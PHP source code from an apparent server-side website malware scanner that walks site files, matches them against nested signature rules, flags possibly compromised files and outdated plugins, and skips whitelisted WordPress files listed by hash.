define('SSS_VERSION', '1.6');

/* Server side scanner file extensions to check for malware */
 $SSS_EXTENSIONS = array(
 '.php',
 '.htm',
 '.phtml',
 '.shtml',
 '.js',
 '.pl',
 '.py',
 '.sh',
 '.cgi',
 '.asp',
 '.asa',
 '.module',
 );

function printVersionServerSide($fullName, $res)
{
    global $g_lastTrace;

    if ($res === 'trace') {
        if (microtime(true) - $g_lastTrace > 5) {
            // Print every 5 seconds to keep connection from being closed by WAF
            //echo "DEBUG: Recursing version check into $fullName\n";
            @flush();
            $g_lastTrace = microtime(true);
        }
        return;
    }
    if ($res['name'] === 'uploadify' || $res['name'] === 'htaccess') {
        return;
    }
    
    if ($res['dir'] === '.') {
        $res['dir'] = '/ (main folder)';
    }
    
    $info = ' inside: ' . $res['dir'] . ' - Version: ' . $res['version'];
    
    if (isset($res['source'])) {
        $info .= ' (from ' . $res['source'] . ')';
    }
    
    $vwarning = isset($_SERVER['HTTP_X_SUCURI_CLIENTIP']) ? 'Info' : 'VWarning';

    if (isset($res['oldplugin'])) {
        $info = ' at ' . $res['dir'] . ' - Version: ' . $res['version'];
        echo $vwarning . ': vulnerable ' . $res['name'] . ' plugin found' . $info .
            ' Please update this plugin immediately';
        if (isset($res['url'])) {
            echo ': ' . $res['url'] . "\n";
        } else {
            echo ".\n";
        }
    } elseif ($res['updated']) {
        echo 'OK: ' . $res['name'] . ' found (updated)' . $info . ".\n";
    } else {
        echo $vwarning . ': Found outdated ' . $res['name'] . $info . " - Please update asap.\n";
    }
}

function checkwhitelist($signature, $file, $whitelistarray, $is_regex_sig = FALSE)
{
    if ( array_key_exists($signature, $whitelistarray) ) {
        foreach($whitelistarray[$signature] as $myigfiles)
        {
           if(stripos($file, $myigfiles) !== FALSE)
           {
             return(1);
           }
        }

    }
    elseif ($is_regex_sig) {
        foreach($whitelistarray['all_sigs'] as $whitelist_files)
        {
            if(stripos($file, $whitelist_files) !== FALSE)
            {
              return(1);
            }
        }
    }

}

//Main loop for checking sigs
function sigs_loop($sigs, $buffer, $file, $is_chain=false)
{
    $done = FALSE;

    foreach ($sigs as $trigger => $sigarray)
    {
        if ( ( $trigger !== (string)$trigger ) ||
             ( (int)$sigarray[0] !== $sigarray[0] ) ) //is_string and is_int are allegedly slower than this
        {
            continue;
        }

        if ($sigarray[0] < 1000 ) // plain text trigger
        {
        	$pos = strpos(($sigarray[0] === STR_PATH_TRIGGER) ? $file : $buffer, $trigger);
        }
        else // regex trigger
        {
            $pos = preg_match("/$trigger/", ($sigarray[0] === REX_PATH_TRIGGER) ? $file : $buffer, $matches) === 1;
        }
        if ($pos === FALSE && $sigarray[0] !== STR_WHITE && $sigarray[0] !== REX_WHITE) {
            continue;
        }

        switch ($sigarray[0]) {
            case STR_CLEARFILE: // cleanup sigs
            case STR_CLEARLINE:
            case STR_CLEAR_LINEMATCH:
            case STR_CLEAR_MULTIMATCH:
            case STR_CLEAR_NONCONTINUAL: // new type of signature
                $done = process_SSS($trigger, $sigarray, $buffer, $file, false);
                break;
            case REX_CLEARFILE: // rex cleanup sigs
            case REX_CLEAR_LINEMATCH:
            case REX_CLEAR_MULTIMATCH:
            case REX_CLEAR_NONCONTINUAL: // new type of signature
                # all final regex signatures are disabled for now
                #$done = process_SSS($trigger, $sigarray, $buffer, $file, true);
                break;
            case REX_TRIGGER: // nested sigs
            case STR_TRIGGER: // nested sigs
            case REX_PATH_TRIGGER: // nested signature based on file path
            case STR_PATH_TRIGGER: // nested signature based on file path
                $done = sigs_loop($sigarray, $buffer, $file, false);
                break;
            case REX_CHAIN_TRIGGER: // nested sigs
            case STR_CHAIN_TRIGGER: // nested sigs
                $done = sigs_loop($sigarray, $buffer, $file, true);
                break;
            case REX_WARN: // regex-triggered warnings
                # all final regex signatures are disabled for now
                #$done = process_SSS($matches[0], $sigarray, $buffer, $file, true);
                break;
            case STR_WARN: // warns
                $done = process_SSS($trigger, $sigarray, $buffer, $file, false);
                break;                
            case REX_STOP: // stop sigs
            case STR_STOP: // stop sigs
                $done = process_SSS($trigger, $sigarray, $buffer, $file, false);
                break;
            case REX_WHITE: // STR whitelist of whole file based on strings instead of path
            case STR_WHITE: // REgex whitelist of whole file based on strings instead of path
                if ($pos === false) {
                    // Treat this signature as nested if the string was not found
                    $done = sigs_loop($sigarray, $buffer, $file, false);
                    break;
                } else {
                    continue 2; // Skip the nested signatures if the string was found
                }
            default: // undefined sig type
                output("Unknown signature type: " . $sigarray[0]);
                continue 2;
        }

        if ($done && !$is_chain)
        {
            break;
        }
    }
    return $done;
}

function process_SSS($trigger, $sigarray, $buffer, $file, $is_regex)
{
    global $whitelist_count;
    global $WHITELIST_SIG;
    global $REGEX_WHITELIST_SIG;
    global $AUTOCLEAN;

    $whitelist = $is_regex ? $REGEX_WHITELIST_SIG : $WHITELIST_SIG;
    if ( checkwhitelist($sigarray[1], $file, $whitelist, $is_regex) === 1 )
    {
        $whitelist_count++;
        return FALSE;
    }
    $fpcheck = substr($buffer, strpos($buffer, $trigger), 50);
    if(strpos($fpcheck,'eval($_hookCode) : ') !== FALSE ||
       strpos($fpcheck,'eval($_params[') !== FALSE ||
       strpos($fpcheck,'eval($_smarty_php_resource,') !== FALSE)
    {
        return FALSE; // it's a FP
    }
    $path = str_replace(array('(', ')'), array('&#40;', '&#41;'), $file);
    echo "MWarning: File possibly compromised: $path ($sigarray[1]). Manual review recommended.\n";
    return TRUE;
}

$MD5_WHITELIST = array(
    // Large files from the recent WordPress
	'e038d79118a4c30f753e20ab850f2944265b6514f53fc71cf2082ba07296d860' => 1,
	'7b9d329af018f49e07056679b27aad56070ceb1157c741cebc962127480f5020' => 1,
	'8426d5c7e50d2f442f7f83d89d5c18a13860a13df826ea0f294976e1715f9c74' => 1,
	'a1c40e6c11a0f59b912eb79e4abba9c935843b830b19a33fcf7174d670580f93' => 1,
	'5922841abee469d45dc113e1670814d04ea835c08941a143d3bfc20d532c2cdb' => 1,
	'211c540947d1a5d57ee6a0c651ab7514f7e013774dbab5361b98d4cd779711ba' => 1,
	'b0afa74a54e847c845df83371aa57796f5dc35543a0a1a42960f5ddb04e2a86f' => 1,
	'22e26388aab30adc66d33812cbd04a60e9029838bd10afbb113123a9a3e781c4' => 1,
	'eb518842fba9d3d9238b900eabfb4662fa56904527c1123d085978c6d8d83255' => 1,
	'd4897d4be5c283cffeda8b357ed1da674cbd7a8f5d224dc0afb07668c9ec7787' => 1,
	'9302546c554761c7c6b0521be3c9460073cf0aea0b4c2c4ddb9b2f2c109add8a' => 1,
	'55593757ac91cad88a24d8ce363c4a86a2a4a61dc93c9cea60168a291af91e10' => 1,
	'5cd4df3749fa29aefca71455d14bf0239a92554b0080004d9b78b81161fc2b4b' => 1,
	'ea1007f59f8305065b22700f40e204e9fb1927a5cf01e04e5c1b4d56afee2b4c' => 1,
	'420b5ee436011db89953454e54b9a87b97b1f5e2c02b7c990ac481ff60bd2fec' => 1,
	'dd01e87c611af376fc3f603317cd5db23d567e0c912e99f570ab9cc186686d28' => 1,
	'6bb2c883eb2609053f6bddd3b2c8a11b03eb89a29680943cc46f1ea45c36e8b3' => 1,
	'408bee48705abf75ef4b707e5bb386fca116bce7b87ba40efb0a8d499f3cb44f' => 1,
	'e5df436eb1006cecfb12635ece42055e9ea3096fb8765cdfee8d62f81961400e' => 1,
	'19b9f27dfa7d8cdc1fdd1a92a9b0183b744bb0e8da41276e404d17cf260833f4' => 1,
	'1737fefeb8fabd7e5fee8688714f725293df268a4ab4f3faa5515d8a768ca4db' => 1,
	'59771da21c568de3ef660baa8d3936df9153c4f8f2666d7f70521db8a407b552' => 1,
	'c9e9218981df9cb9e9cdb31eb9e917c6965b7cab22d627ef6f5a30e2b20d693e' => 1,
	'ae0230214abfd8b54b2b92ff987af6e2f2084bd652de3664ea0a9c59ce16e91a' => 1,
	'25f1e04d3a31ccc260f310db76dc63c13e8c850c1a9be9b9a0258c8ae6850ec7' => 1,
	'6f36f0440470f4ef79c7c62d93c3881504a018cb1b65b35f983bc2e02dbeeb0b' => 1,
	'ee07b1f79a1bbebead57b73d801c4622544b1380ef1d5daeaf8761d5fda8448f' => 1,
	'f556e184a3762cd06ff3e9376cc34cc3a70957de16c4c78883995e9132ac5e11' => 1,
	'8f2dbdbbde0979fd08249a2c84b328b7aff8a65589eb66fc8d237220ca6867b3' => 1,
	'65ece1580c8936fbeb49d8132cd749115feb2ad1cc5ae20833daec8285694b2b' => 1,
	'18245f7c483413dc4d3e489fbf9d2cbb585dc32bdb2cd9ffe4060b04d64623c3' => 1,
	'12e37374e2b049078f8790cf7e7e5b8871d4c7adefa879447e73807bf713e9da' => 1,
	'55692d479dfae1256ecb32087834abb12849bf0029b85e2a7a004b8d2aff6b01' => 1,
	'aaf67b5c52244d0e0f16ed63da7bae2440af59c44d911a23bc02a2bbc6867b56' => 1,
	'46cbf6a4b08420d54026f8d5192a0ab2e20f54bc63c355e309666125be6c6245' => 1,
	'd25a53ae64bf6bd9fa011e89b4b0caf45420b629c60bf0881dc85c9a796db615' => 1,
	'c137587d50e79458bbfa69cca6c938782d70d1f4dd57682fcc0934bdc701a7f6' => 1,
	'5bd21bf7179ec7ed1adb7348029fa29daf106f5cdc083dfb2da35297bcf1252f' => 1,
	'bd69e4a56a0c3279a19647916a36b3d65474a9aff36f74efeab43b124d375f1f' => 1,
	'fa4dcb2f763cd4af3f0b8f119ea9078af3bf1850d8930e1ebe59098f2d475d99' => 1,
	'3085b05097382e65c71b0f9ec0380d240c1061d06cd0dad37b2405d8d496e7a5' => 1,
	'6c186087554191b7ebc8d339e06bc67125feb0750c0e0e9ebaf47e0b2fb360c3' => 1,
	'96aa03d9d9ba0313e40cca00484bf1fd49d3b4e276d07d34a88ccefcc74af952' => 1,
	'50cf5942b5b699b4f4df1f059eb03032b00febdac6c73c7b54cd77af7a45433a' => 1,
	'2ec8fdd24e644a7b2602e0c78eec146c604d3bcbdc3095750e6b39750605d7de' => 1,
	'5245700dd29ff3729a4091d8a0842dfd141babc0ac8b00c3a27163f0a2953eea' => 1,
	'fa095cd9800e8ae657bd9c73f5f3fe9a23f8b4f63df7cd8fd66a5f048f5060b1' => 1,
	'bc8c6d014a5110bcde65bc7a0a762b2be100d4abf8d87ca9e98fd2478ed7d377' => 1,
	'f022ff52df1f8a36a962d8d7f220f23f87fb244d738d762c134d9f373449b394' => 1,
	'879424099b855bbbee412458e84ea00017bedb4abe38ab0d34e121cf8b0e90ea' => 1,
	'7567c601901e177883bfeb7476e2cb29e51a50c494a0943819cfca09a1e8e4bc' => 1,
	'3d637ffec60e5cd77e2497e0bfa0bc20454b7ad0b89cc7a94e68b2549b6ce818' => 1,
	'ba95e55a8ef3a47879e14c20de2886f55349f8f98f329f38fd533ae6e9989f1f' => 1,
	'fbb22ababad1c89a3df8720c824eb0589b1ca1cbe31c1583f5a72348eaf6ceb6' => 1,
	'7253262a86691a2e52aa083fdafad04caa03f7f16a6c5ab7c670cbbc76140b5e' => 1,
	'b7a50a5e61bcc260106836ba98af742690befbc2155840ae3d9490bb8c2b5920' => 1,
	'c246bce2f9f71fb6f5b1d220c0f875c389b2c9adb26357ee6a0b9b5c182cc8dd' => 1,
	'b6ca2d3184dc1b586d619718d242425d5dfd4a6e998cbe5b92df399eb21ff391' => 1,
	'7654364f5232e4cd8744cdbff5912b7c4ced5f95aaca9e5c2c6b0d554bfa94f8' => 1,
	'b966db7ad87683a3bbb38944162bcf10a465a43acb3a78e081c257313c128187' => 1,
	'ad9b0d0f6eceba8b5cc274d2403860ea9f29fa0f3e6a2ee5ba4b1463417d8895' => 1,
	'8fdd3075e7314b6cf2ddec360e34d91234e9cdc9e060ce5b96066e3c4d0220bc' => 1,
	'dcca5d7b733ec4a068429a729d2b0cdfc67d8daa3bdb5e37c243210a505c7b08' => 1,
	'a4534b1cb8541d19a4778c581ec48e2b22d546d80f61c085d27faeca887b3049' => 1,
	'5168b07862da06d7cd569f987c429bb060ae6d326a682fd12167de9bb4174909' => 1,
	'4f11c6d5118d355eb26fbce654fd1db0c15e5652f66ed77afc07552e2fba42e4' => 1,
	'2c99fb22d6e2350197d5e1aac220df4a8560aae2d4b944104f0c4768ad720d54' => 1,
	'9309b5d57897098ac82a5d0cf296ecb651b43b6eac4520557b46e543367ca27b' => 1,
	'1048fd7454773c8231f01ee508bbc6b683e4a17b01adb64471ea045837a1488c' => 1,
	'ef845acd98122442aed21881097d5a33546030f54b074847bde6d05eb97dc9d2' => 1,
	'751106894ca110f5578005a0e70e9b37c4359d899a0a5e3c8602b37859de4b4e' => 1,
	'5ecfdc480bb304926b8d799e19ac858f1e066f8297b506bc9fbd7decd084e0ef' => 1,
	'771aa133af1b477943e5ecf1034148b8074e7b595c48367d2ff12bf3e2b057ad' => 1,
	'49f1c0d3ff690d4924e836d728145114e8adc0c3f2eeca6eab29f8426ff0ae55' => 1,
	'faaed8bd0ac370d07db5d7e363de4b690e9597e103470a28ffe9edb69f4cc1d6' => 1,
	'09f633fba40ac9785d8caea44cf4a89a98178c2f782454eee6c02ddd09bb3451' => 1,
	'76483bc24e7ff4b90d76d3857907c9d16023a0cacb8f189b41168eea62835435' => 1,
	'056df9080a710538bfad8ad24ca2bd0433f16f0e40f07964c89415684092b7f9' => 1,
	'7da8655dcb231a1f24c1d8e9c17cc573a81aea29055512d74b4d7fa06a237dcd' => 1,
	'795643f7e8b76e3beede6b9e135bea2e96cfd36f97360d8466b9cff2502cec88' => 1,
	'df45a3545e6dcb60d28af45dc9fe7f6d15dd1ce0a792c7c33ec374f36774babf' => 1,
	'ecccf0257be8d7c21406cc66647015ebbc9af13331220911bc63e1f6a751b404' => 1,
	'23d31be9cff4c22bdc4895cb27f6cc49ed0f8cf08b754ddbacde85772af75d99' => 1,
	'f87b3993e3668d7d22832e1104a50566bb20d70e1ac6e8734a4c530caccc6c72' => 1,
	'b199872d60e1ed9c3acd865dc244b8d65710b4e23208befa73c0dcd87f5dfc20' => 1,
	'3c80d009861226a89b2d152d1bbd9990c26f27bbd8481977edb5277fe7303342' => 1,
	'a0ca8bdf395f73b347347dcddfcd8237b98b65e274ba38de2b47f6ea9d379187' => 1,
	'3663f313dab48bbfa85fe430aa58f45db00fa4c8b178adcabd60539919ef4cf1' => 1,
	'bde70c498952189a0d3a403c90d30a0fbd3195528ab38acad975afae820d3a6c' => 1,
	'ceca9c5c332b91addffe55e214973869aafe9c8d8a61787b81437e725c505c67' => 1,
	'855b964642733c6bcdead73dc3bfbf4059ac258ce0a2446e306cb95bab7087e0' => 1,
	'd8cb76e7c7e3c6a6cd8511f138d27c70f1d7cbef5cd6915955af57781c8a5555' => 1,
	'710c95d9e39ac2e88c482a4c3dab519dee0e26f6557afbda8f532c01ace42b6a' => 1,
	'8e14ac1bdc5c4377c375f02e034e59ffd9a4cf050899231499eba12344654184' => 1,
	'14e16095f68c41f55591982b6077a2b515ce1f8b2feaa229fc14e69782244aa3' => 1,
	'0a7a22a763b3bf72908ba1a2615be563fd22d458923fcdd40e031b85bc6990e1' => 1,
	'43e27f752dc51bb14b27987a445c652ee41d56d0eed31ca424a6d65a3c4ca6ac' => 1,
	'ef4a690761e737971fc76c2f23a5b789c26103dbcc0648e5c63c6d47955916f8' => 1,
	'5477291fd3d5b3ce693b0b7ba9dbf4d82ba519e81b1bc9f0f89f05359aeb2317' => 1,
	'd06ccf7763c1c1dc2de649cb4e23aa1859f427ae88b745179440dd6788f7569c' => 1,
	'3bf0750f51712b020105fe965a793e7d16ebcf727f0bc45d26f70df8ea9d3eae' => 1,
	'f0ae0aa5a2a959ab8912d069bc0dab4a1cdd8df3dc7ff268f9f01918c4b09b15' => 1,
	'f93957855b4a624adaf2cc98d3456ffbf0e3eb1c0753446492ce640ed11999b7' => 1,
	'37b6f5012ba9247862085d512fe2520595a0c491e13431eff4ec6b90bd292e27' => 1,
	'7e062e139bb32e77d8045475f1f7fe85bbcf8b438ab5449ff23325213d4595c9' => 1,
	'b50026f27de8e0114da4ae485f431e855ab112e18d4a60efffcec1ee9a079dc0' => 1,
	'52a3c2b111d31665aa9e7a206b3f934257adf74bee3e6a43a27e10930e5f9501' => 1,
	'0cd9386d6d5c3a91ab612ea9aaec378c73a8a252af1ac10dd157580ab29d12ff' => 1,
	'f6ccb20cf857778b6441cbe6ac302f2eaa6d98183c46844a29c2d6d579487fbd' => 1,
	'e89a29a47dcf725a17cb790e90b3ba493eb7cbe3125e5aa4baae786275ac4e1b' => 1,
	'b7602f72586fc074b38f70fda8ad84473f7629627eb31c536570a875298d4f5a' => 1,
	'be980a5fc23ec8efaefe454b0a007c1edd5fd72e77a8cc14eca8c487c58adc7c' => 1,
	'750d1d32c176fe892569a1b2117fd353c4d0e934de77fe36f13de0bafa70fa0b' => 1,
	'8142f3222df83884a6d34b03c575c94ca8b5f514181c843db06862361a0b9e2b' => 1,
	'2a093ea18e8c60941a9958e17cd8f4917505762043d1cb518a5ce15225f7d6df' => 1,
	'f8caeef5636068fb8792af6c2e0e8bd793a3f9275d874242d766e9ac309bc0aa' => 1,
	'd4d03067ba015f93520118ca38ccfa13844e30239bf9adee343ce73e23212ec2' => 1,
	'90338ecb301f62468a18597bb44697ff6071e8692c4c5d79ab8f67a2335614aa' => 1,
	'74d93ac18c764f0563f29a4ac8b8f552d967d6cbb107c3d0a86255d9f6eacd89' => 1,
	'dd31bf442facd1e6a97f957900e599886341ab2d241d16b75f4280223b857dc4' => 1,
	'dddabcaa9ce067ff2a550bc9d334525309b569eaec4d79dc3cdc39dadf633838' => 1,
	'8ea6271dad095c2608ffdb21cd25e168bb99cd730f31e582656c35113356eaac' => 1,
	'e86cf2547d6c97dcb0065faa30787dca8566a9ad199072e778b9b1df7ab8dc1f' => 1,
	'a4b3b91b775b356ac4b5c34ac94dbcc1212ef23b5e89bfa9bfcc92e285a4447a' => 1,
	'f72a6c881a6d14c2906b87604bd905e05cee3f8d830db57ff8a2ab394526971b' => 1,
	'309474689d936bbfe9c3ac6e33de1737b17369e4fe467cffd0a003f755747dcb' => 1,
	'3523d8fb108dca2d46fd29d4a71db479c151e63703fe57354ad61955371d64b7' => 1,
	'3bc0a513cae8e56aa2bbc043832934c45f6f5a0bf7f92842991283d53070090b' => 1,
	'1e9c2492b3fd5d3b38ad0f763da06a3953843aa0a442f020353d94e29b6bd7e3' => 1,
	'505e6760b024efde28e515a9cdbc0e0d218ffebe7fc765423611dee9c29f1855' => 1,
	'954c8bc73a71b3ec051f588c7938b9a0f5e7e183c63538851d87628b246a1625' => 1,
	'6ba052825cc19659ff487013c08b09d95f1be29731a3b1615fe6a32c83251fd3' => 1,
	'c99fb641e7f72724c5b9062e30efdb868bb516e91c5153e67a8b829374149ea2' => 1,
	'34233e0b37a0e8f6d11657eba25125ff15bb67fd2eea82482347fc1fe9506cc3' => 1,
	'89f0a4720fbf46c4958c99480aedec0a0ba35c0b9cc32bfedbb0ec69b903a575' => 1,
	'12bbe88e11f2404097dc962c675a9811c7917f98c644515f7803cae1ae902c9e' => 1,
	'06e463e29e85d6431ee4fefb512dbe2a448b89862476f8bf7baae82ea0a21d90' => 1,
	'0ac15a69096d8001b8d993b87e206f76f6c3df09a964d4a2126df3cfd5c44b71' => 1,
	'9cfc378d9b158e1b4b6b6e4f8f1d7a0237662c97c1b60a1c9645357c6082a2b6' => 1,
	'7291f3620250e9598b843133a9d89736ffab747374278713deb6755e29947da1' => 1,
	'b74c690e2d9d1456b8d204c9236d2916b4587aebfedd0775a029c8c3b17192c6' => 1,
	'f6aa236a511cb2d96c58eb2aaef77eb8c37e6308289879ec95c2972cf1fd246f' => 1,
	'1cfe2b656ab1e2fead23c47c11701c855546c4410e7806441fe394f1b8cbe8ea' => 1,
	'82553c2592b850578947ba04fad335f73d594c1200fa70af7720734903dba213' => 1,
	'35b7113814ba6c116b00d067b5525dc8f4b5134405d95cc3cdf167e56cabde14' => 1,
	'b85555010a3735d9c953b12b1af23d8b57eed3dbbe8b3f6607470f3899d54d53' => 1,
	'ca6f5b4951c14bb0f59e507a39edbc4464f8cda0eb2f6614ca8b0adf6bab8e8b' => 1,
	'003bbb8aa2d144ec9f28eb521610afffeb029f95c62c25b344eeed97888f680f' => 1,
	'475582ec8c3ce97c3a3b1e6946db82ded20803852b1945b4341fdb52fa2d7190' => 1,
	'c6afc4971e106fad7d885cbff0f420a54cd22a97e38b16ab2bb471da78fa0690' => 1,
	'a4da418c818c83b89a800e11a176fdb1e1fd8ccbbea79aca819e466a88f3d5ba' => 1,
	'771978edfcc0d1636fe3e49f6ed790dfa7eb216db4ad9cfabb405d51c7b700ab' => 1,
	'50bed96b29c6142c20abc38234287d217208ff8c77ea50a0ed767bb2a94f6244' => 1,
	'acb0bf820b92426b8a14ed01fd3fc7785d7104753804c6e80b0fa00ded563212' => 1,
	'e9cc1387e714837a5789bdcf8adb82c1c36bcd31b4a936dda08c1460a4f8ecfc' => 1,
	'e14f8f2ec8bba6d647210edc60067744c1ff3edb005b5dd27deeb921badc5cd8' => 1,
	'3c1fdc1df9805cdb51d20c7023c46ea3b4b720394c1d8f030789884bac482fea' => 1,
	'd16bea4601aade751a9000a2624bd140f2df225495303f6e6de03e6b34bab095' => 1,
	'b8f68eadbcb0b3b8aec285968aa43adca5a60cb81f83c60a076c0a2848628c32' => 1,
	'9d0ced375e6a78d4978eb1b8118df89e10db056e2880380aebdad853b29c30a7' => 1,
	'fb92c67b0ba9eec93969551b2bcf451a213f6616149b5e467dbfc469b990eb8c' => 1,
	'8220cecb3d37a133177948b3f8b35c060039db0f4ed113fa11352927be129bbe' => 1,
	'090c1bf3589f7ad9f558bf0c4d69470880e56fc737f54f88853f7c91469bac37' => 1,
	'aa0188059dedcf80891629be52f9321633026e84f3c28e251dc4ff2b7910993c' => 1,
	'94ad6516b6b9e941be76f4de9f3367fb4fee9afbdb05ffd1251a48f0df05036a' => 1,
	'3f858990e993616cde7e330b2f7402ec65924e6a01d433997b36d55ba9062be5' => 1,
	'edea317b2d9b850d80412f9a5595219e177b488a597c4667fa6a88a6aef771ad' => 1,
	'b959746c067af1e51c941bcc49af89039627d48e4b7c24280eb0491c537c287f' => 1,
	'18ffe296c28537083318ea70832f41479f4ad61c37677a0fe588f644a92fddb1' => 1,
	'1627935638482c653a173db7a5afee272d610cf6a87fbcea5940405d6bbd857e' => 1,
	'80b11f45b31334e0256c4a458adfbf390b7cfe7eb4e654c6729d14191bd0d607' => 1,
	'b887710adb0b4c59333ce849851f15a7b4d4e48ab9fae8ed4324a51f1ad4cea6' => 1,
	'4938595c420f9db61f1f9bbb4e4226b5606f0487d3b4de061e9a59fcca43d0ac' => 1,
	'83c20dcd792db1be988ca2b8af426c9b827fcc8e14caeca1fd4134430083f597' => 1,
	'1a2dae2b1d468677dd53f2db61b2920e223c56d96590e2cff48b0f357655e47a' => 1,
	'bc981d673a2aeb4d81228215856d29eaa482cc2b0394eecb5f96b1c8016db90e' => 1,
	'0dddf2564079cea7a1b04dbb0d1f10843d5847c605bbda6a3870b89e6cef5e11' => 1,
	'a8a2170ba7e101e0ca0ec0b5d1fff0f9768ef7b0c80eec00d40b99e142553e4a' => 1,
	'90d0772f4ac65a21520c2f103e5eef43f939e66d453e5afd7b89c29f188036c3' => 1,
	'735633583c5f1abb9217cbe61a0f04acf95ff0fe362d1d2cb0b935aec8f10fbc' => 1,
	'e16addd2cf0619d51ace6a142055d14c195ef19dfe58c8e04313df56f6b66756' => 1,
	'bb5765b4f4fe020e9ba7d1ebc8f6bdf71d32e0add7af65f4c91acaaa41464d4d' => 1,
	'b6884bce8767f6c839e467045e060a330a1ea79db745afda2cc39b3d82b40e95' => 1,
	'b9ae479946b3268ce1139e65df9f0eb10430823050eeb87ffe494e61afd76963' => 1,
	'64800a30e4646d7e4dc6662030bd5741f66cc58b41a33bfaec5d579c584d31fd' => 1,
	'1e020828460f59c1ba5992fa21e009d4a9f3e770dfca8c3fcc152a5381199b7b' => 1,
	'507456226f148d16810c811bd25444a184af4854e2287ae11d9fc3b3f03ddce5' => 1,
	'48fe7e0bdad149e02c2aa7d43fea4534c764ee19ef78456952a74c1979b00a68' => 1,
	'51a50c6dfd0e3005aa9020a0fafb7618ee17f18a7ce9c0b6cb8524fb11aecc2b' => 1,
	'92eb921da77d631562177b8a127b8fdd039ff6a105a39a5fb11038659982f74c' => 1,
	'2a6267892585e5bae0741a10be6af6e77188f191b1bd3f6023b563908cd3aa15' => 1,
	'66a7ed84c14c41b2a90a6f3b058be99f060ddde92194b3e8f7dd1a03ff7b44fe' => 1,
	'9202a623c54b003609e3015fb575699cf016d2f66eec03e5d720e8597645155f' => 1,
	'014ecb100b3c2c845c58387139352550fba131e0cb1e75addf9c1a49b7eba959' => 1,
	'5871097a85a185ee7504da4619f60300444cfb114fd05763305c4b2c63db49e4' => 1,
	'60fe99f604095139f292fc039f0cec1476ec226ffa6ce9a724974618ba720f65' => 1,
	'e974271e3260b2be6b88f7ee67c60d4a130f08c4e45fc856408b8d82e1c2c736' => 1,
	'e35d2a72143ef32c6e6919d47af28ddff8f10cc3d8c08155d42c2f19a4124618' => 1,
	'c4de1dc39c9bf399decea0eed8f87a25217932a95a5cb363ff12afc4066603d6' => 1,
	'e947cc3297d90b1e187db462a1cf79b56b374fff329ab4136b40287a1f8e0f8a' => 1,
	'146c1259dd8b37148195307395e8babcc2fa505734858a978c9d3cb779d06e9f' => 1,
	'c8f4ffda9895fe917650a9e23e892829006c1f6eceec6e78eedfceb73c00d941' => 1,
	'9d15a1bccdf2e9d9117781093fcb162bfe253fd448cb5fd65802e2bd7c235c1d' => 1,
	'b8c1d99c3e02ec5c48756255053445bf640961127317e68a1367a1972d44c112' => 1,
	'bd5a98a5835fa0919ae5c9376f5c1af8f93cffc6c2566b8fef904882a7cf4d3f' => 1,
	'0a7480c8aeb2a347855b0f15acdd83160881e883d21952305591cf02b17c0079' => 1,
	'fe276c1cb136e831a8e3c08b0a6e7f6d851f67d6dd442f6a2104d93b2d6b38c1' => 1,
	'f231addd80dda3ece586072f5ebbeeb376cfa231004659c5d0833d9fedbc66f5' => 1,
	'1df46be3136e06191d8067e02cc12a9dd8b02b0b636fd4e1b64a5e11681f0f6c' => 1,
	'0b1ad182b3afc9f722d64ab2dfb407395f247219d6271162835c39c8f4dd3f63' => 1,
	'86344d37ebee571f2f2a50be1866fe56e6cb5e862f4ec5fd50993d19c60c01db' => 1,
	'46e9016ce2c969273166ca3264af4e8e2eae500b08abd5f1f04f6b312796c897' => 1,
	'f9c3f511ca355f2c878cbdef20b53daa81504b6ae2fdec7efcb5508e2d359d71' => 1,
	'9324e650c656e39c611a8df8a87b9ee179e13c61b7ee70080f19cabe25798564' => 1,
	'2a81b81bf61b95803ca679fe8ceeedddeee61499c72f6b72c1778b9e35aa5ac9' => 1,
	'ff65931085ce11a7bf83b26c71eb98d009fa4fe7a81cf3cefceb995f3c9c74d3' => 1,
	'1a9d48bbfdbfd5c38417be8c7e646293ddfb0ba48d82cadfb88d23b2def669ad' => 1,
	'd11c8b52c404b7646d5a530f0139ee512df84792deb6e91704da864d42b6a83b' => 1,
	'ddaa79e7d5d66526e7309385365082e86f8f036ce4e201ecd17137605e68ba55' => 1,
	'3616edd841ffb4c1937a207c787d0d8048e93b4c34a339bed9b9d4f0a1e226a3' => 1,
	'ec35cdd800091a8b653a918ee41a801529ccbd43d28b7c32114396512b3fd93e' => 1,
	'23e723d2c90aa30e649c3d816bee814910f3424ce8690f4619a0f5bd8526c259' => 1,
	'1f3927500803cba997b34a82fa44bc020f55787709b088ff124e03ab14ef4ccf' => 1,
	'6c3283e975b781aeaed450e387f7e2b674a384125869901b1b3352030574f448' => 1,
	'642a9d12dc6dc403160940d547f6c489340806efb86488281ed2d9116c854286' => 1,
	'819a14778549250b8eacbebe2ac8c0e63448d0fdd08a9cf465727940865c6f76' => 1,
	'184e314779c58950dfc6d485938cb4f6a6b37b1c84d041ebcac1df96fe5d1526' => 1,
	'3065fab46214d8600a4bc414192deb489edb0eafb3d5525b332700403d588123' => 1,
	'8ab86e1ade3cd762d6d5a882de1983ee94b3a1902f329117c7c58a1be8ffc0f7' => 1,
	'7bee51391f01a907302e299cf87964767a0d61b1b43def675eb995a49bfd8390' => 1,
	'1010e5635046b5bf5bc0b960b92121dfc73f7490292a0c596ceb89e541076be8' => 1,
	'1b5d8e503805edc311c26145312e1b0317052ecf89e8c353c9d239e795da956e' => 1,
	'c68a880944aa03082e88bbe6c7df7747ee45f506fa777e76fb41709a0ba5a935' => 1,
	'b6fbaae375b3f2b3d1ca885ba16f46f138e34ee75006b7d5bdc3200c119c1e85' => 1,
	'b70376bcd266a20e83621e6f920073f3d51eb42fb75b533b46d716cf2b51be9a' => 1,
	'fc48d1d80ece71a79a7b39877f4104d49d3da6c3665cf6dc203000fb7df4447e' => 1,
	'fe5d09013cdf89dd17c511c908bee2628e4c0f9b4550f802fdb1fd5086999c8d' => 1,
	'ba6ad27dd93884c875c17988fb463d0af15f70fd7d53969d79274f9cfe02a420' => 1,
	'df7667a0380d57f508016bbe78d085ab7f7bc782b128df6d46e815162ea6e82b' => 1,
	'c9fb8595b38724ea9f2efda4bcc018f839e31e3d69e2c08b07d7889239b7d080' => 1,
	'eb7e788f6016944e258309006861d1c854918d838b40ee9d9ec7612fb98adbb3' => 1,
	'08e0d913aadaef201fd3200ca49fa991a2d8d02b3d9a54621123d71837bbc73f' => 1,
	'9023e3275b6d897b202ddb9848872a661fea055c96c2973a02e1cf5e39f04afd' => 1,
	'429f6b7a5802c15145bddd69b400dae34b814eebd42ea1a32934c9a55a159391' => 1,
	'bd6416a91b5220df2ddd1eeaf56c76501748101969b945a5ab568d706b3a7768' => 1,
